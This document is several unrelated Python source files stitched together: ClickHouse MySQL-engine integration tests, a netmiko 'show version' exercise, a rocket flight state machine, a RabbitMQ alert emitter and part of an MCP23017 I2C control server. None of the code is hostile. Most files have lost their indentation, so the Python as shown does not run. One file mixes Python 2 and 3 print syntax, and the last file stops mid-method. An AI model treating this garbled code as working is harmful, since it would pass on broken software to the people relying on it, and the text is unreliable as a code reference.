PRIMARY KEY (`id`)) ENGINE=InnoDB;
"""
drop_table_sql_template = """
DROP TABLE IF EXISTS `clickhouse`.`{}`;
"""
def get_mysql_conn(started_cluster, host):
conn = pymysql.connect(user='root', password='clickhouse', host=host, port=started_cluster.mysql_port)
return conn
def create_mysql_table(conn, tableName):
with conn.cursor() as cursor:
cursor.execute(create_table_sql_template.format(tableName))
def drop_mysql_table(conn, tableName):
with conn.cursor() as cursor:
cursor.execute(drop_table_sql_template.format(tableName))
def create_mysql_db(conn, name):
with conn.cursor() as cursor:
cursor.execute("DROP DATABASE IF EXISTS {}".format(name))
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".format(name))
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
conn = get_mysql_conn(cluster, cluster.mysql_ip)
create_mysql_db(conn, 'clickhouse')
## create mysql db and table
conn1 = get_mysql_conn(cluster, cluster.mysql2_ip)
create_mysql_db(conn1, 'clickhouse')
yield cluster
finally:
cluster.shutdown()
def test_many_connections(started_cluster):
table_name = 'test_many_connections'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse');
'''.format(table_name, table_name))
node1.query("INSERT INTO {} (id, name) SELECT number, concat('name_', toString(number)) from numbers(10) ".format(table_name))
query = "SELECT count() FROM ("
for i in range (24):
query += "SELECT id FROM {t} UNION ALL "
query += "SELECT id FROM {t})"
assert node1.query(query.format(t=table_name)) == '250\n'
drop_mysql_table(conn, table_name)
conn.close()
def test_insert_select(started_cluster):
table_name = 'test_insert_select'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse');
'''.format(table_name, table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
assert node1.query("SELECT count() FROM {}".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT sum(money) FROM {}".format(table_name)).rstrip() == '30000'
conn.close()
def test_replace_select(started_cluster):
table_name = 'test_replace_select'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse', 1);
'''.format(table_name, table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
assert node1.query("SELECT count() FROM {}".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT sum(money) FROM {}".format(table_name)).rstrip() == '30000'
conn.close()
def test_insert_on_duplicate_select(started_cluster):
table_name = 'test_insert_on_duplicate_select'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse', 0, 'update money = money + values(money)');
'''.format(table_name, table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
assert node1.query("SELECT count() FROM {}".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT sum(money) FROM {}".format(table_name)).rstrip() == '60000'
conn.close()
def test_where(started_cluster):
table_name = 'test_where'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse');
'''.format(table_name, table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
assert node1.query("SELECT count() FROM {} WHERE name LIKE '%name_%'".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT count() FROM {} WHERE name NOT LIKE '%tmp_%'".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT count() FROM {} WHERE money IN (1, 2, 3)".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT count() FROM {} WHERE money IN (1, 2, 4, 5, 6)".format(table_name)).rstrip() == '0'
assert node1.query(
"SELECT count() FROM {} WHERE money NOT IN (1, 2, 4, 5, 6)".format(table_name)).rstrip() == '10000'
assert node1.query(
"SELECT count() FROM {} WHERE name LIKE concat('name_', toString(1))".format(table_name)).rstrip() == '1'
conn.close()
def test_table_function(started_cluster):
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, 'table_function')
create_mysql_table(conn, 'table_function')
table_function = "mysql('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse')".format('table_function')
assert node1.query("SELECT count() FROM {}".format(table_function)).rstrip() == '0'
node1.query(
"INSERT INTO {} (id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000)".format(
'TABLE FUNCTION ' + table_function))
assert node1.query("SELECT count() FROM {}".format(table_function)).rstrip() == '10000'
assert node1.query("SELECT sum(c) FROM ("
"SELECT count() as c FROM {} WHERE id % 3 == 0"
" UNION ALL SELECT count() as c FROM {} WHERE id % 3 == 1"
" UNION ALL SELECT count() as c FROM {} WHERE id % 3 == 2)".format(table_function,
table_function,
table_function)).rstrip() == '10000'
assert node1.query("SELECT sum(`money`) FROM {}".format(table_function)).rstrip() == '30000'
node1.query("INSERT INTO {} (id, name, age, money) SELECT id + 100000, name, age, money FROM {}".format(
'TABLE FUNCTION ' + table_function, table_function))
assert node1.query("SELECT sum(`money`) FROM {}".format(table_function)).rstrip() == '60000'
conn.close()
def test_binary_type(started_cluster):
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, 'binary_type')
with conn.cursor() as cursor:
cursor.execute("CREATE TABLE clickhouse.binary_type (id INT PRIMARY KEY, data BINARY(16) NOT NULL)")
table_function = "mysql('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse')".format('binary_type')
node1.query("INSERT INTO {} VALUES (42, 'clickhouse')".format('TABLE FUNCTION ' + table_function))
assert node1.query("SELECT * FROM {}".format(table_function)) == '42\tclickhouse\\0\\0\\0\\0\\0\\0\n'
def test_enum_type(started_cluster):
table_name = 'test_enum_type'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32, source Enum8('IP' = 1, 'URL' = 2)) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse', 1);
'''.format(table_name, table_name))
node1.query("INSERT INTO {} (id, name, age, money, source) VALUES (1, 'name', 0, 0, 'URL')".format(table_name))
assert node1.query("SELECT source FROM {} LIMIT 1".format(table_name)).rstrip() == 'URL'
conn.close()
def test_mysql_distributed(started_cluster):
table_name = 'test_replicas'
conn1 = get_mysql_conn(started_cluster, started_cluster.mysql_ip)
conn2 = get_mysql_conn(started_cluster, started_cluster.mysql2_ip)
conn3 = get_mysql_conn(started_cluster, started_cluster.mysql3_ip)
conn4 = get_mysql_conn(started_cluster, started_cluster.mysql4_ip)
create_mysql_db(conn1, 'clickhouse')
create_mysql_db(conn2, 'clickhouse')
create_mysql_db(conn3, 'clickhouse')
create_mysql_db(conn4, 'clickhouse')
create_mysql_table(conn1, table_name)
create_mysql_table(conn2, table_name)
create_mysql_table(conn3, table_name)
create_mysql_table(conn4, table_name)
node2.query('DROP TABLE IF EXISTS test_replicas')
    # Storage with 3 replicas
node2.query('''
CREATE TABLE test_replicas
(id UInt32, name String, age UInt32, money UInt32)
ENGINE = MySQL('mysql{2|3|4}:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse'); ''')
# Fill remote tables with different data to be able to check
nodes = [node1, node2, node2, node2]
for i in range(1, 5):
nodes[i-1].query('DROP TABLE IF EXISTS test_replica{}'.format(i))
nodes[i-1].query('''
CREATE TABLE test_replica{}
(id UInt32, name String, age UInt32, money UInt32)
ENGINE = MySQL('mysql{}:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse');'''.format(i, 57 if i==1 else i))
nodes[i-1].query("INSERT INTO test_replica{} (id, name) SELECT number, 'host{}' from numbers(10) ".format(i, i))
# test multiple ports parsing
result = node2.query('''SELECT DISTINCT(name) FROM mysql('mysql{57|2|3}:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse'); ''')
assert(result == 'host1\n' or result == 'host2\n' or result == 'host3\n')
result = node2.query('''SELECT DISTINCT(name) FROM mysql('mysql57:3306|mysql2:3306|mysql3:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse'); ''')
assert(result == 'host1\n' or result == 'host2\n' or result == 'host3\n')
# check all replicas are traversed
query = "SELECT * FROM ("
for i in range (3):
query += "SELECT name FROM test_replicas UNION DISTINCT "
query += "SELECT name FROM test_replicas)"
result = node2.query(query)
assert(result == 'host2\nhost3\nhost4\n')
    # Storage with two shards, each with 2 replicas
node2.query('DROP TABLE IF EXISTS test_shards')
node2.query('''
CREATE TABLE test_shards
(id UInt32, name String, age UInt32, money UInt32)
ENGINE = ExternalDistributed('MySQL', 'mysql{57|2}:3306,mysql{3|4}:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse'); ''')
# Check only one replica in each shard is used
result = node2.query("SELECT DISTINCT(name) FROM test_shards ORDER BY name")
assert(result == 'host1\nhost3\n')
# check all replicas are traversed
query = "SELECT name FROM ("
for i in range (3):
query += "SELECT name FROM test_shards UNION DISTINCT "
query += "SELECT name FROM test_shards) ORDER BY name"
result = node2.query(query)
assert(result == 'host1\nhost2\nhost3\nhost4\n')
# disconnect mysql57
started_cluster.pause_container('mysql57')
result = node2.query("SELECT DISTINCT(name) FROM test_shards ORDER BY name")
started_cluster.unpause_container('mysql57')
assert(result == 'host2\nhost4\n' or result == 'host3\nhost4\n')
def test_external_settings(started_cluster):
table_name = 'test_external_settings'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, started_cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node3.query(f'DROP TABLE IF EXISTS {table_name}')
node3.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse');
'''.format(table_name, table_name))
node3.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(100) ".format(
table_name))
assert node3.query("SELECT count() FROM {}".format(table_name)).rstrip() == '100'
assert node3.query("SELECT sum(money) FROM {}".format(table_name)).rstrip() == '300'
node3.query("select value from system.settings where name = 'max_block_size' FORMAT TSV") == "2\n"
node3.query("select value from system.settings where name = 'external_storage_max_read_rows' FORMAT TSV") == "0\n"
assert node3.query("SELECT COUNT(DISTINCT blockNumber()) FROM {} FORMAT TSV".format(table_name)) == '50\n'
conn.close()
def test_settings_connection_wait_timeout(started_cluster):
table_name = 'test_settings_connection_wait_timeout'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
wait_timeout = 2
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}
(
id UInt32,
name String,
age UInt32,
money UInt32
)
ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse')
SETTINGS connection_wait_timeout={}, connection_pool_size=1
'''.format(table_name, table_name, wait_timeout)
)
node1.query("INSERT INTO {} (id, name) SELECT number, concat('name_', toString(number)) from numbers(10) ".format(table_name))
def worker():
node1.query("SELECT sleepEachRow(1) FROM {}".format(table_name))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
# ensure that first query started in worker_thread
time.sleep(1)
started = time.time()
with pytest.raises(QueryRuntimeException, match=r"Exception: mysqlxx::Pool is full \(connection_wait_timeout is exceeded\)"):
node1.query("SELECT sleepEachRow(1) FROM {}".format(table_name))
ended = time.time()
assert (ended - started) >= wait_timeout
worker_thread.join()
drop_mysql_table(conn, table_name)
conn.close()
def test_predefined_connection_configuration(started_cluster):
conn = get_mysql_conn(started_cluster, started_cluster.mysql_ip)
table_name = 'test_table'
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql1);
''')
node1.query("INSERT INTO test_table (id, name, money) select number, toString(number), number from numbers(100)")
assert (node1.query(f"SELECT count() FROM test_table").rstrip() == '100')
node1.query('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql1, replace_query=1);
''')
node1.query("INSERT INTO test_table (id, name, money) select number, toString(number), number from numbers(100)")
node1.query("INSERT INTO test_table (id, name, money) select number, toString(number), number from numbers(100)")
assert (node1.query(f"SELECT count() FROM test_table").rstrip() == '100')
node1.query_and_get_error('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql1, query=1);
''')
node1.query_and_get_error('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql1, replace_query=1, on_duplicate_clause='kek');
''')
node1.query_and_get_error('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(fff);
''')
node1.query_and_get_error('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql2);
''')
node1.query('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql3, port=3306);
''')
assert (node1.query(f"SELECT count() FROM test_table").rstrip() == '100')
# Regression for (k, v) IN ((k, v))
def test_mysql_in(started_cluster):
table_name = 'test_mysql_in'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}
(
id UInt32,
name String,
age UInt32,
money UInt32
)
ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse')
'''.format(table_name, table_name)
)
node1.query("INSERT INTO {} (id, name) SELECT number, concat('name_', toString(number)) from numbers(10) ".format(table_name))
node1.query("SELECT * FROM {} WHERE (id) IN (1)".format(table_name))
node1.query("SELECT * FROM {} WHERE (id) IN (1, 2)".format(table_name))
node1.query("SELECT * FROM {} WHERE (id, name) IN ((1, 'name_1'))".format(table_name))
node1.query("SELECT * FROM {} WHERE (id, name) IN ((1, 'name_1'),(1, 'name_1'))".format(table_name))
drop_mysql_table(conn, table_name)
conn.close()
if __name__ == '__main__':
with contextmanager(started_cluster)() as cluster:
for name, instance in list(cluster.instances.items()):
print(name, instance.ip_address)
input("Cluster created, press any key to destroy...")
|
exercise7.py
|
#!/usr/bin/env python
"""
Exercise 7. Repeat exercise #6 except use processes.
"""
import time
from multiprocessing import Process, current_process
from netmiko import ConnectHandler
from net_system.models import NetworkDevice
import django
def show_version(device):
"""
Function to get output of 'show version'.
"""
remote_connection = ConnectHandler(device_type=device.device_type,
ip=device.ip_address, port=device.port,
username=device.credentials.username,
password=device.credentials.password)
print '=' * 50
print device.device_name
print '-' * 15
print remote_connection.send_command_expect('show version')
def main():
"""
The main function
"""
django.setup()
device_list = NetworkDevice.objects.all()
starttime = time.time()
procs_list = []
for device in device_list:
device_proc = Process(target=show_version, args=(device,))
device_proc.start()
procs_list.append(device_proc)
for a_proc in procs_list:
        print(a_proc)
a_proc.join()
finishtime = time.time()
total_elapsed_time = finishtime - starttime
    print('*' * 50)
    print('Overall retrieval time: %.2f seconds' % round(total_elapsed_time, 2))
    print('*' * 50)
if __name__ == '__main__':
main()
|
State.py
|
"""
State.py
========
Perform actions of the rocket and manage state.
`hooks` is a dictionary mapping a hook string to a
list of functions to thread when the hook occurs.
"""
import datetime
from os import system
from threading import Thread
class State:
def __init__(self, conf, data, hooks={}):
self.hooks = hooks
self.conf = conf
self.data = data
# Map of state to function
self.actions = {
"HALT": self.halt, # Rocket should not do anything
"ARM": self.arm, # Rocket is ready to begin state system
"UPWARD": self.upward, # Rocket is going up
"APOGEE": self.apogee, # Rocket is at apogee
"DOWNWARD": self.downward, # rocket is going down
"EJECT": self.eject, # rocket is at main ejection altitude
"RECOVER": self.recover, # rocket is in recovery state
"SHUTDOWN": self.shutdown,
"RESTART": self.restart,
}
self.activate_hook("halt_start")
def act(self) -> str:
"""
Use the correct method for the correct state.
"""
self.conf.last_state = self.conf.state # Update last state
self.conf.state = self.actions[self.conf.state]() # Perform action
return self.conf.state # Return current state
def activate_hook(self, hook_name : str) -> None:
"""
Activate a hook function.
"""
print(f"Activating hook '{hook_name}'")
for function in self.hooks.get(hook_name, []):
t = Thread(target=function, args=(self.conf,self.data))
t.start()
def halt(self) -> str:
"""Do nothing. A halted rocket shouldn't do anything."""
return "HALT"
def arm(self) -> str:
"""
Wait for launch.
System is going up if it is 100 meters in the air and 8/10 of the last
dp readings are negative.
"""
# Detect if system starts to go up
distance_above_ground = self.data.to_dict()["sensors"]["alt"]
if self.data.check_dp_lt_val(0) and distance_above_ground > 100:
self.activate_hook("arm_end")
self.activate_hook("upward_start")
return "UPWARD"
return "ARM"
def upward(self):
"""Change state to Use air-stoppers if necessary."""
if self.data.check_dp_gt_val(0):
self.activate_hook("upward_end")
self.activate_hook("apogee_start")
return "APOGEE"
return "UPWARD"
def apogee(self):
"""Eject parachute."""
self.activate_hook("apogee_end")
self.activate_hook("downward_start")
return "DOWNWARD"
def downward(self):
"""Wait until correct altitude."""
if self.data.to_dict()["sensors"]["alt"] < self.conf.MAIN_ALTITUDE:
self.activate_hook("wait_end")
self.activate_hook("eject_start")
return "EJECT"
return "DOWNWARD"
def eject(self):
"""Eject other parachute."""
self.activate_hook("eject_end")
self.activate_hook("recover_start")
return "RECOVER"
def recover(self):
"""Do nothing."""
return "RECOVER"
def restart(self):
"""Restart the system."""
system('reboot now')
def shutdown(self):
"""Shutdown the system."""
system("shutdown -s")
def __str__(self):
return str(self.conf.state)
def __repr__(self):
return str(self)
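# Minimal wiring sketch (illustrative only): `conf` and `data` stand in for the
# project's real config and telemetry objects, so construction is left commented.
if __name__ == '__main__':
    def announce(conf, data):
        print(f"{datetime.datetime.now()}: hook fired in state {conf.state}")
    hooks = {
        "arm_end": [announce],       # each listed function runs in its own
        "upward_start": [announce],  # thread when the hook is activated
    }
    # state = State(conf, data, hooks)  # conf/data come from the real project
    # while True:
    #     state.act()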
|
AlertEvent.py
|
import pika
import json
import os
import logging
import time
from threading import Thread
def emit_alert_event(type, data):
def emitter():
try:
time.sleep(2)
rabbit_credentials = pika.PlainCredentials(os.environ.get("RABBITMQ_DEFAULT_USER"), os.environ.get("RABBITMQ_DEFAULT_PASS"))
connection = pika.BlockingConnection(pika.ConnectionParameters(host=os.environ.get("RABBITMQ_HOST"), port=os.environ.get("RABBITMQ_PORT"), credentials=rabbit_credentials))
channel = connection.channel()
channel.queue_declare(queue='alert_events')
data['event_type'] = type
body = json.dumps(data)
channel.basic_publish(exchange='', routing_key='alert_events', body=body.encode('utf-8'))
connection.close()
except Exception as e:
logging.error("There was an error with MQ. Exception: {0}".format(e))
thread = Thread(target = emitter)
thread.daemon = True
thread.start()
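# Consumer sketch (not part of the original module): one way a worker could
# drain the 'alert_events' queue that emit_alert_event() publishes to. The
# connection settings mirror the emitter above; the handler callback and the
# function name are illustrative only.
def consume_alert_events(handler):
    credentials = pika.PlainCredentials(os.environ.get("RABBITMQ_DEFAULT_USER"),
                                        os.environ.get("RABBITMQ_DEFAULT_PASS"))
    connection = pika.BlockingConnection(pika.ConnectionParameters(
        host=os.environ.get("RABBITMQ_HOST"),
        port=os.environ.get("RABBITMQ_PORT"),
        credentials=credentials))
    channel = connection.channel()
    channel.queue_declare(queue='alert_events')
    def on_message(ch, method, properties, body):
        # Each message is the JSON document built in emit_alert_event().
        handler(json.loads(body))
        ch.basic_ack(delivery_tag=method.delivery_tag)
    channel.basic_consume(queue='alert_events', on_message_callback=on_message)
    channel.start_consuming()
# Example: consume_alert_events(lambda event: logging.info("alert: %s", event))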
|
mcp23017server.py
|
#!/usr/bin/env python
"""
MCP23017 Control Service.
A service that acts as an interface between (e.g. Home Assistant) clients and the I2C bus on a Raspberry Pi.
Author: find me on codeproject.com --> JurgenVanGorp
"""
import traceback
import os
import sys
import time
import logging
import redis
from logging.handlers import RotatingFileHandler
import xml.etree.ElementTree as ET
from datetime import datetime
from smbus2 import SMBus
from threading import Thread, Lock
VERSION = "1.00"
###
### USER EDITABLE CONSTANTS #####################################################################
###
# CONFIGURATION_FILE is the name of the configuration file that will be written on the home
# location of the current user when running the program. The configuration file is read at
# the first start of the program, e.g. after a power failure, to make sure that the
# MCP23017 devices are reconfigured to their latest state.
# The CONFIGURATION_FILE contains the latest configured MCP23017 DIR values, which will
# be written on the I2C channel once on the bus after e.g. a cold boot.
# Remark that the dot in front of the filename makes it invisible for a regular ls.
# CONFIGURATION_FILE = ".mcp23017control.xml" --> Default value
# CONFIGURATION_FILE = '' --> Set to empty string to disable this feature.
CONFIGURATION_FILE = ".mcp23017server.xml"
# LOG_LEVEL determines the level of logging output into the system logs.
# Log Level = 0 --> No logging at all
# Log Level = 1 --> (DEFAULT) give details on application status and errors only
# Log Level = 2 --> Babble, babble, babble ...
# Remark that the dot in front of the filename makes it invisible. The file is saved
# in your home folder.
LOG_LEVEL = 1
LOG_FILE = '.mcp23017server.log'
# DEMO_MODE_ONLY = True --> Print on screen what would happen on the I2C bus. Use this
# when e.g. running the program manually (not as a service) to verify operation for
# your own software.
# DEMO_MODE_ONLY = False --> Actually write the values on the I2C bus
DEMO_MODE_ONLY = False
# Acceptable Commands for controlling the I2C bus
# These are the commands you need to use to control the DIR register of the MCP23017, or
# for setting and clearing pins.
FINDBOARD = "IDENTIFY" # Identify Board number, return 1 if found on the I2C bus
GETDIRBIT = "GETDBIT" # Read the specific IO pin dir value (1 = input)
GETDIRREGISTER = "GETDIRREG" # Read the full DIR register (low:1 or high:2)
SETDIRBIT = "SETDBIT" # Set DIR pin to INPUT (1)
CLEARDIRBIT = "CLRDBIT" # Clear DIR pin command to OUTPUT (0)
GETIOPIN = "GETPIN" # Read the specific IO pin value
GETIOREGISTER = "GETIOREG" # Read the full IO register (low:1 or high:2)
SETDATAPIN = "SETPIN" # Set pin to High
CLEARDATAPIN = "CLRPIN" # Set pin to low
TOGGLEPIN = "TOGGLE" # Toggle a pin to the "other" value for TOGGLEDELAY time
# If a pin is high, it will be set to low, and vice versa
TOGGLEDELAY = 0.1 # Seconds that the pin will be toggled. Default = 100 msec
# The COMMAND_TIMEOUT value is the maximum time (in seconds) that is allowed between pushing a
# button and the action that must follow. This is done to protect you from delayed actions
# whenever the I2C bus is heavily used, or the CPU is overloaded. If you e.g. push a button,
# and the I2C is too busy with other commands, the push-button command is ignored when
# COMMAND_TIMEOUT seconds have passed. Typically you would push the button again if nothing
# happens after one or two seconds. If both commands are stored, the light is switched on and
# immediately switched off again.
# Recommended minimum value one or two seconds
# COMMAND_TIMEOUT = 2
# Recommended maximum value is 10 seconds. Feel free to set higher values, but be prepared that
# you can experience strange behaviour if there is a lot of latency on the bus.
COMMAND_TIMEOUT = 1.5
# Communications between Clients and the server happen through a Redis in-memory database
# so as to limit the number of writes on the (SSD or microSD) storage. For larger implementations
# dozens to hundreds of requests can happen per second. Writing to disk would slow down the
# process, and may damage the storage.
# Make sure to have Redis installed in the proper locations, e.g. also in the virtual python
# environments. The default is that Redis is installed on localhost (127.0.0.1).
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
###
### PROGRAM INTERNAL CONSTANTS ####################################################################
###
# Software version
VERSION = '0.9.0'
# MCP23017 default parameters are that you can address the devices in the 0x20 to 0x2F
# address space with the three selector pins. You can change these if you want to use
# the software for other I2C devices.
MINBOARDID = 0x20 # Minimum I2C address
MAXBOARDID = 0x2f # Maximum I2C address
MINPIN = 0x00 # Minimum pin on the MCP23017
MAXPIN = 0x10 # Maximum pin on the MCP23017, +1 (i.e. must be lower than this value)
# Time-out in seconds before the threads are considered dead. If the time-out is reached,
# the thread will crash and die, and is expected to be restarted as a service
WATCHDOG_TIMEOUT = 5
### Define MCP23017 specific registers
IODIRA = 0x00 # IO direction A - 1= input 0 = output
IODIRB = 0x01 # IO direction B - 1= input 0 = output
IPOLA = 0x02 # Input polarity A
IPOLB = 0x03 # Input polarity B
GPINTENA = 0x04 # Interrupt-onchange A
GPINTENB = 0x05 # Interrupt-onchange B
DEFVALA = 0x06 # Default value for port A
DEFVALB = 0x07 # Default value for port B
INTCONA = 0x08 # Interrupt control register for port A
INTCONB = 0x09 # Interrupt control register for port B
IOCON = 0x0A # Configuration register
GPPUA = 0x0C # Pull-up resistors for port A
GPPUB = 0x0D # Pull-up resistors for port B
INTFA = 0x0E # Interrupt condition for port A
INTFB = 0x0F # Interrupt condition for port B
INTCAPA = 0x10 # Interrupt capture for port A
INTCAPB = 0x11 # Interrupt capture for port B
GPIOA = 0x12 # Data port A
GPIOB = 0x13 # Data port B
OLATA = 0x14 # Output latches A
OLATB = 0x15 # Output latches B
ALLOUTPUTS = "0xff" # Initial value of DIR register if not yet used
# The dummy command is sent during initialization of the database and verification if
# the database can be written to. Dummy commands are not processed.
DUMMY_COMMAND = 'dummycommand'
### END OF CONSTANTS SECTION #########################################################
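# Client-side sketch (not part of the server): how a client could submit one of
# the commands defined above through the Redis databases and wait for the
# reply. Field names follow the comments in databaseHandler below; the function
# name, polling interval and return format are illustrative. Requires
# redis-py >= 3.5 for hset(..., mapping=...).
def example_client_request(command, boardnr, pinnr, datavalue='0x00'):
    commands = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=0)
    responses = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=1)
    # The command id is a timestamp, exactly as the server expects it.
    cmd_id = (datetime.now() - datetime.utcfromtimestamp(0)).total_seconds()
    commands.hset(cmd_id, mapping={'command': command, 'boardnr': boardnr,
                                   'pinnr': pinnr, 'datavalue': datavalue})
    commands.expire(cmd_id, round(COMMAND_TIMEOUT + 2))
    # Poll the Responses database until the server answers or the time-out hits.
    deadline = time.time() + COMMAND_TIMEOUT
    while time.time() < deadline:
        reply = responses.hgetall(cmd_id)
        if reply:
            return reply.get(b'datavalue'), reply.get(b'response')
        time.sleep(0.01)
    return None, 'Error: no response within COMMAND_TIMEOUT'
# Example: example_client_request(TOGGLEPIN, '0x20', '0x03')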
class databaseHandler():
"""
A class for communicating between the server and clients through a shared memory Redis
database. Two databases are initiated (or used) for communicating from client to
server (0) or from server to client (1).
"""
def __init__(self, the_log):
# Commands have id datetime.now().strftime("%d-%b-%Y %H:%M:%S.%f"), i.e. the primary key is a timestamp.
# Commands given at exactly the same time, will overwrite each other, but this is not expected to happen.
# The commands table is then formatted as (all fields are TEXT, even if formatted as "0xff" !!)
# id, command TEXT, boardnr TEXT DEFAULT '0x00', pinnr TEXT DEFAULT '0x00', datavalue TEXT DEFAULT '0x00'
self._commands = None
# Responses have id datetime.now().strftime("%d-%b-%Y %H:%M:%S.%f"), i.e. the primary key is a timestamp.
# The Responses table is then formatted as (all fields are TEXT, even if formatted as "0xff" !!)
# id, command_id TEXT, datavalue TEXT, response TEXT
self._responses = None
# Copy logfile to local
self._log = the_log
# Initialize database
self.OpenAndVerifyDatabase()
def OpenAndVerifyDatabase(self):
"""
Opens an existing database, or creates a new one if not yet existing. Then
verifies if the Redis database is accessible.
"""
# First try to open the database itself.
try:
# Open the shared memory databases.
# Redis database [0] is for commands that are sent from the clients to the server.
nowTrying = "Commands"
self._log.info(1, "Opening Commands database.")
self._commands = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=0)
# Redis database [1] is for responses from the server to the clients.
nowTrying = "Responses"
self._log.info(1, "Opening Responses database.")
self._responses = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=1)
except OSError as err:
# Capturing OS error.
self._log.error(1, "FATAL OS ERROR. Could not open [{}] database. This program is now exiting with error [{}].".format(nowTrying, err))
# If a database cannot be opened, this program makes no sense, so exiting.
sys.exit(1)
except:
# Capturing all other errors.
self._log.error(1, "FATAL UNEXPECTED ERROR. Could not open [{}] database. This program is now exiting with error [{}].".format(nowTrying, sys.exc_info()[0]))
# If a database cannot be opened, this program makes no sense, so exiting.
sys.exit(1)
# Do a dummy write to the Commands database, as verification that the database is fully up and running.
